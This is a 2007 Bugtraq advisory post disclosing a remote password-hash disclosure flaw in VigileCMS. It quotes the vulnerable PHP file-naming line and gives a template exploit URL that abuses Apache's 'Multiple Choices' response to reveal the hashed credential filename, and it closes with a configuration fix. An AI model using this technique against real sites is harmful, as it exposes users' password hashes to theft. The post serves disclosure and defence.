Home page logo
/

bugtraq logo Bugtraq mailing list archives

[Trick] VigileCMS All Versions DataMining Remote Hash Disclosure
From: kingoftheworld92 () fastwebnet it
Date: 25 Oct 2007 21:32:24 -0000

 ____            __________         __             ____  __
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |
 |___|___|  /\__|  /______  /\___  >__|            |___||__|
          \/\______|      \/     \/

Http://www.inj3ct-it.org             Staff[at]inj3ct-it[dot]org

VigileCMS All Versions DataMining Remote Hash Disclosure
        (Works only whit Checkspelling off)

#By KiNgOfThEwOrLd

PoC:

In apache, if the checkspelling propriety retourn "off", the HTTP error 300 (Multiple Chois) is probably actived. So,
VigileCMS, doesn't use any database, but save the users credentials in a php file. Let's read the code..

 $fp=fopen(USERS_TAB."/$_POST[utente].$md5.php","w");

This script make a file called username.md5hash.php located in /db/users . Surelly, while the developer was writing
this code, he thought that nobody can find this file if he doesn't know the target md5...but usign the HTTP error, we
can do it! We need to know only the target username!
Exploit:

http://[target]/[vigilecms_path]/db/users/[target_username]
In fact, if we try to visit that url, the server will answer:
Multiple Choices
The document name you requested (/db/users/[target_username]) could not be found on this server. However, we found
documents with names similar to the one you requested.

Available documents:
/db/users/[target_username].[target_md5_hash].php (common basename)
How to fix:

Set "Checkspelling ON" on your apache.